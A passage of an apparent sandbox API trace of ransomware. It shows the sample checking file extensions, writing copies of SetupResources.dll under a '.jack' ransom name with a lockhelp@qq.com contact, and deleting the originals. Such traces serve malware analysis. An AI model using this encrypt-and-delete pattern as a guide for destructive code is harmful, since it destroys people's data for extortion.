(lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0196.831] lstrlenW (lpString=".doc") returned 4 [0196.831] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.831] lstrlenW (lpString=".docx") returned 5 [0196.831] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.831] lstrlenW (lpString=".pdf") returned 4 [0196.831] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.831] lstrlenW (lpString=".xls") returned 4 [0196.831] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.831] lstrlenW (lpString=".xlsx") returned 5 [0196.831] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.831] lstrlenW (lpString=".ppt") returned 4 [0196.831] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.831] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0196.831] lstrlenW (lpString=".zip") returned 4 [0196.831] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.831] lstrlenW (lpString=".rar") returned 4 [0196.831] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.831] lstrlenW (lpString=".bz2") returned 4 [0196.832] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.832] lstrlenW (lpString=".7z") returned 3 [0196.832] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.832] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0196.832] lstrlenW (lpString=".dbf") returned 4 [0196.832] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.832] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0196.832] lstrlenW (lpString=".1cd") returned 4 [0196.832] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.832] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0196.832] lstrlenW (lpString=".jpg") returned 4 [0196.832] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.832] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0196.832] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0196.832] lstrlenW (lpString=".doc") returned 4 [0196.832] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.832] lstrlenW (lpString=".docx") returned 5 [0196.832] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.832] lstrlenW (lpString=".pdf") returned 4 [0196.832] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.832] lstrlenW (lpString=".xls") returned 4 [0196.832] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.832] lstrlenW (lpString=".xlsx") returned 5 [0196.832] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.832] lstrlenW (lpString=".ppt") returned 4 [0196.832] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.832] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0196.833] lstrlenW (lpString=".zip") returned 4 [0196.833] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.833] lstrlenW (lpString=".rar") returned 4 [0196.833] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.833] lstrlenW (lpString=".bz2") returned 4 [0196.833] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.833] lstrlenW (lpString=".7z") returned 3 [0196.833] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.833] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0196.833] lstrlenW (lpString=".dbf") returned 4 [0196.833] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.833] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0196.833] lstrlenW (lpString=".1cd") returned 4 [0196.833] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.833] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0196.833] lstrlenW (lpString=".jpg") returned 4 [0196.833] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.833] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0196.833] lstrlenW (lpString="SetupResources.dll") returned 18 [0196.833] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.834] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=18264) returned 1 [0196.834] CloseHandle (hObject=0x3f0) returned 1 [0196.834] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll")) returned 0x80 [0196.834] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.834] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.834] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.834] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.834] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0196.871] GetLastError () returned 0x0 [0196.871] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x4758, lpOverlapped=0x0) returned 1 [0196.885] WriteFile (in: hFile=0x40c, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x4760, lpOverlapped=0x0) returned 1 [0196.886] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.886] WriteFile (in: hFile=0x40c, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0196.886] SetEndOfFile (hFile=0x40c) returned 1 [0196.886] CloseHandle (hObject=0x40c) returned 1 [0196.892] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.892] SetEndOfFile (hFile=0x3f0) returned 1 [0196.893] CloseHandle (hObject=0x3f0) returned 1 [0196.893] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.893] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll")) returned 1 [0196.894] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0196.894] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0196.894] lstrlenW (lpString=".doc") returned 4 [0196.894] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.894] lstrlenW (lpString=".docx") returned 5 [0196.894] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.894] lstrlenW (lpString=".pdf") returned 4 [0196.894] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.894] lstrlenW (lpString=".xls") returned 4 [0196.894] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.894] lstrlenW (lpString=".xlsx") returned 5 [0196.894] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.894] lstrlenW (lpString=".ppt") returned 4 [0196.894] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.894] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0196.894] lstrlenW (lpString=".zip") returned 4 [0196.894] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.894] lstrlenW (lpString=".rar") returned 4 [0196.894] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.894] lstrlenW (lpString=".bz2") returned 4 [0196.894] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.894] lstrlenW (lpString=".7z") returned 3 [0196.894] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.894] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0196.895] lstrlenW (lpString=".dbf") returned 4 [0196.895] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.895] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0196.895] lstrlenW (lpString=".1cd") returned 4 [0196.895] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.895] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0196.895] lstrlenW (lpString=".jpg") returned 4 [0196.895] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.895] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0196.895] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0196.895] lstrlenW (lpString=".doc") returned 4 [0196.895] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.895] lstrlenW (lpString=".docx") returned 5 [0196.895] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.895] lstrlenW (lpString=".pdf") returned 4 [0196.895] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.895] lstrlenW (lpString=".xls") returned 4 [0196.895] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.895] lstrlenW (lpString=".xlsx") returned 5 [0196.895] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.895] lstrlenW (lpString=".ppt") returned 4 [0196.895] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.895] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0196.895] lstrlenW (lpString=".zip") returned 4 [0196.895] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.895] lstrlenW (lpString=".rar") returned 4 [0196.895] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.895] lstrlenW (lpString=".bz2") returned 4 [0196.896] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.896] lstrlenW (lpString=".7z") returned 3 [0196.896] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0196.896] lstrlenW (lpString=".dbf") returned 4 [0196.896] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0196.896] lstrlenW (lpString=".1cd") returned 4 [0196.896] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0196.896] lstrlenW (lpString=".jpg") returned 4 [0196.896] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.896] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0196.896] lstrlenW (lpString="SetupResources.dll") returned 18 [0196.896] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.897] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=16728) returned 1 [0196.897] CloseHandle (hObject=0x3f0) returned 1 [0196.897] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll")) returned 0x80 [0196.897] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.897] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.897] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.898] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.898] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0196.899] GetLastError () returned 0x0 [0196.899] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x4158, lpOverlapped=0x0) returned 1 [0196.901] WriteFile (in: hFile=0x40c, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x4160, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x4160, lpOverlapped=0x0) returned 1 [0196.903] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.903] WriteFile (in: hFile=0x40c, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0196.903] SetEndOfFile (hFile=0x40c) returned 1 [0197.185] CloseHandle (hObject=0x40c) returned 1 [0197.186] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.186] SetEndOfFile (hFile=0x3f0) returned 1 [0197.188] CloseHandle (hObject=0x3f0) returned 1 [0197.188] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.188] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll")) returned 1 [0197.188] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0197.188] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0197.188] lstrlenW (lpString=".doc") returned 4 [0197.188] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.189] lstrlenW (lpString=".docx") returned 5 [0197.189] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.189] lstrlenW (lpString=".pdf") returned 4 [0197.189] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.189] lstrlenW (lpString=".xls") returned 4 [0197.189] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.189] lstrlenW (lpString=".xlsx") returned 5 [0197.189] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.189] lstrlenW (lpString=".ppt") returned 4 [0197.189] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.189] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0197.189] lstrlenW (lpString=".zip") returned 4 [0197.189] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.189] lstrlenW (lpString=".rar") returned 4 [0197.189] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.189] lstrlenW (lpString=".bz2") returned 4 [0197.189] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.189] lstrlenW (lpString=".7z") returned 3 [0197.189] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.189] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0197.189] lstrlenW (lpString=".dbf") returned 4 [0197.189] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.189] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0197.189] lstrlenW (lpString=".1cd") returned 4 [0197.189] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.189] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0197.189] lstrlenW (lpString=".jpg") returned 4 [0197.189] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.190] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0197.190] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0197.190] lstrlenW (lpString=".doc") returned 4 [0197.190] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.190] lstrlenW (lpString=".docx") returned 5 [0197.190] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.190] lstrlenW (lpString=".pdf") returned 4 [0197.190] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.190] lstrlenW (lpString=".xls") returned 4 [0197.190] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.190] lstrlenW (lpString=".xlsx") returned 5 [0197.190] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.190] lstrlenW (lpString=".ppt") returned 4 [0197.190] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.190] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0197.190] lstrlenW (lpString=".zip") returned 4 [0197.190] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.190] lstrlenW (lpString=".rar") returned 4 [0197.190] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.190] lstrlenW (lpString=".bz2") returned 4 [0197.190] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.190] lstrlenW (lpString=".7z") returned 3 [0197.190] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.190] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0197.190] lstrlenW (lpString=".dbf") returned 4 [0197.190] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.191] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0197.191] lstrlenW (lpString=".1cd") returned 4 [0197.191] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.191] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0197.191] lstrlenW (lpString=".jpg") returned 4 [0197.191] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.191] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0197.191] lstrlenW (lpString="SetupResources.dll") returned 18 [0197.191] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.191] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=18264) returned 1 [0197.191] CloseHandle (hObject=0x3f0) returned 1 [0197.191] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll")) returned 0x80 [0197.192] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.192] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.192] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.192] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.192] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0197.234] GetLastError () returned 0x0 [0197.234] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x4758, lpOverlapped=0x0) returned 1 [0197.241] WriteFile (in: hFile=0x408, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x4760, lpOverlapped=0x0) returned 1 [0197.242] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.242] WriteFile (in: hFile=0x408, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.242] SetEndOfFile (hFile=0x408) returned 1 [0197.242] CloseHandle (hObject=0x408) returned 1 [0197.245] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.245] SetEndOfFile (hFile=0x3f0) returned 1 [0197.246] CloseHandle (hObject=0x3f0) returned 1 [0197.246] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.246] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll")) returned 1 [0197.247] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0197.247] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0197.247] lstrlenW (lpString=".doc") returned 4 [0197.247] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.247] lstrlenW (lpString=".docx") returned 5 [0197.247] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.247] lstrlenW (lpString=".pdf") returned 4 [0197.247] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.247] lstrlenW (lpString=".xls") returned 4 [0197.247] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.247] lstrlenW (lpString=".xlsx") returned 5 [0197.247] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.247] lstrlenW (lpString=".ppt") returned 4 [0197.247] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.247] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0197.247] lstrlenW (lpString=".zip") returned 4 [0197.247] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.247] lstrlenW (lpString=".rar") returned 4 [0197.247] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.247] lstrlenW (lpString=".bz2") returned 4 [0197.247] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.247] lstrlenW (lpString=".7z") returned 3 [0197.247] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.247] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0197.248] lstrlenW (lpString=".dbf") returned 4 [0197.248] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.248] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0197.248] lstrlenW (lpString=".1cd") returned 4 [0197.248] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.248] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0197.248] lstrlenW (lpString=".jpg") returned 4 [0197.248] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.248] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0197.248] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0197.248] lstrlenW (lpString=".doc") returned 4 [0197.248] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.248] lstrlenW (lpString=".docx") returned 5 [0197.248] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.248] lstrlenW (lpString=".pdf") returned 4 [0197.248] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.248] lstrlenW (lpString=".xls") returned 4 [0197.248] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.248] lstrlenW (lpString=".xlsx") returned 5 [0197.248] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.248] lstrlenW (lpString=".ppt") returned 4 [0197.248] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.248] 